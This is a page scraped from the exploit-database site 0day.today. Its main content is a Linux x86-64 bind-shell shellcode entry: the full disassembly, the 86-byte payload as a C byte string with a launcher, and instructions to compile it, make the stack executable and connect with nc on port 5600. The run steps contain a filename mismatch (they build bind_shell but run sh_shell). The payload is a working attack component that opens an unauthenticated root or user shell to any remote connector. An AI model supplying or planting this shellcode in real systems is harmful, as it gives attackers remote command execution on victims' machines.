0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86-64 - bindshell (Port 5600) Shellcode (86 bytes)
/* --------------------------------------------------------------------------------------------------- Linux/x86_64 - bindshell (PORT: 5600) - 86 bytes Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ] Om Asato Maa Sad-Gamaya | Tamaso Maa Jyotir-Gamaya | Mrtyor-Maa Amrtam Gamaya | Om Shaantih Shaantih Shaantih | --------------------------------------------------------------------------------------------------- Disassembly of section .text: 0000000000400080 <.text>: 400080: 48 31 c0 xor %rax,%rax 400083: 48 31 f6 xor %rsi,%rsi 400086: 99 cltd 400087: 6a 29 pushq $0x29 400089: 58 pop %rax 40008a: ff c6 inc %esi 40008c: 6a 02 pushq $0x2 40008e: 5f pop %rdi 40008f: 0f 05 syscall 400091: 48 97 xchg %rax,%rdi 400093: 6a 02 pushq $0x2 400095: 66 c7 44 24 02 15 e0 movw $0xe015,0x2(%rsp) 40009c: 54 push %rsp 40009d: 5e pop %rsi 40009e: 52 push %rdx 40009f: 6a 10 pushq $0x10 4000a1: 5a pop %rdx 4000a2: 6a 31 pushq $0x31 4000a4: 58 pop %rax 4000a5: 0f 05 syscall 4000a7: 50 push %rax 4000a8: 5e pop %rsi 4000a9: 6a 32 pushq $0x32 4000ab: 58 pop %rax 4000ac: 0f 05 syscall 4000ae: 6a 2b pushq $0x2b 4000b0: 58 pop %rax 4000b1: 0f 05 syscall 4000b3: 48 97 xchg %rax,%rdi 4000b5: 6a 03 pushq $0x3 4000b7: 5e pop %rsi 4000b8: ff ce dec %esi 4000ba: b0 21 mov $0x21,%al 4000bc: 0f 05 syscall 4000be: 75 f8 jne 0x4000b8 4000c0: 48 31 c0 xor %rax,%rax 4000c3: 99 cltd 4000c4: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 4000cb: 2f 73 68 4000ce: 53 push %rbx 4000cf: 54 push %rsp 4000d0: 5f pop %rdi 4000d1: 6a 3b pushq $0x3b 4000d3: 58 pop %rax 4000d4: 0f 05 syscall --------------------------------------------------------------------------------------------------- How To Run $ gcc -o bind_shell bind_shell.c $ execstack -s sh_shell $ ./sh_shell How to Connect $ nc <HOST IP ADDRESS> 5600 Eg: $ nc 127.0.0.1 5600 --------------------------------------------------------------------------------------------------- */ #include <stdio.h> char sh[]="\x48\x31\xc0\x48\x31\xf6\x99\x6a\x29\x58\xff\xc6\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05"; void main(int argc, char **argv) { int (*func)(); func = (int (*)()) sh; (int)(*func)(); } # 0day.today [2024-10-05] #